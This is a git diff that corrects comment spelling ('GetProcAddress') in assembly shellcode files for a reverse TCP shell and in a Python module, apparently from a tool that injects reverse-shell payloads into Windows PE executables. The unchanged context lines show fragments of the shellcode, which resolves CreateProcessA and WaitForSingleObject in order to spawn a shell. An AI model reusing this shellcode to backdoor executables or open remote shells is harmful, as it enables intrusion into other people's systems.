diff --git a/asm/src/loadliba_reverse_tcp.asm b/asm/src/loadliba_reverse_tcp.asm index 284135d..a4eafeb 100644 --- a/asm/src/loadliba_reverse_tcp.asm +++ b/asm/src/loadliba_reverse_tcp.asm @@ -90,7 +90,7 @@ try_connect: ; jnz short try_connect failure: -; LoadLibA is in EBX and GetprocessAddress is in ESI +; LoadLibA is in EBX and GetProcAddress is in ESI ; socket is in EDI MUST BE GOING OUT ; No need to exit. ;kernel32.dll!ExitProcess diff --git a/asm/src/loadliba_shell.asm b/asm/src/loadliba_shell.asm index c809767..92c728d 100644 --- a/asm/src/loadliba_shell.asm +++ b/asm/src/loadliba_shell.asm @@ -9,11 +9,11 @@ ; Output: None. ; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified ; Calling getprocaddress and loadlibraryA smashes the following regs: EAX, ECX, EDX, ESP -; Coming in LoadLibA is in EBX and GetprocessAddress is in ESI +; Coming in LoadLibA is in EBX and GetprocAddress is in ESI ; socket is in EDI coming in ;Do a loadlibA of kernel32 -;then getprocessaddress of 'CreateProcessA' +;then getprocaddress of 'CreateProcessA' push 0x0 push 0x32336c65 ; Push kernel32 on the stack push 0x6e72656b ; ... @@ -26,7 +26,7 @@ push 0x61657243 ; ... push esp ; Push a pointer to CreateProcessA string on the stack push eax ; Push handle for kernel32 on the stack - call dword [esi] ; Call getprocessaddress | CreateProcessA address in EAX + call dword [esi] ; Call getprocaddress | CreateProcessA address in EAX xchg ebp, eax ; Put createprocessa in ebp @@ -96,7 +96,7 @@ push_loop: ; call dword [ebx] ; handle for kernel32 now in eax ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax - ; getprocessaddress of 'WaitForSingleObject' + ; getprocaddress of 'WaitForSingleObject' push 0x00746365 ; Push WaitForSingleObject push 0x6a624f65 ; ... push 0x6c676e69 ; ... @@ -105,7 +105,7 @@ push_loop: ; push esp ; Push pointer for WaitForSingleObject push eax ; Push handle for kernel32 xchg eax, ebp ; mov kernel32 to ebp - call dword [edi] ; GetprocessAddress (kernel32, WaitForSingleObject) + call dword [edi] ; GetprocAddress (kernel32, WaitForSingleObject) xchg ebp, eax ; Push waitforsingleobject address in ebp and kernel32 to eax ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax, waitforsingleobject ebp diff --git a/intel/WinIntelPE32.py b/intel/WinIntelPE32.py index ac3d978..9e45e65 100644 --- a/intel/WinIntelPE32.py +++ b/intel/WinIntelPE32.py @@ -773,7 +773,7 @@ def iat_reverse_tcp_inline_threaded(self, flItms, CavesPicked={}): "\x68\x52\x74\x6c\x45" # RtlExitUserThread "\x54" # push esp "\x50" # push eax - "\xff\x17" # call getprocessaddress + "\xff\x17" # call getprocaddress "\x6a\x00" # push 0 "\xff\xd0" # call eax )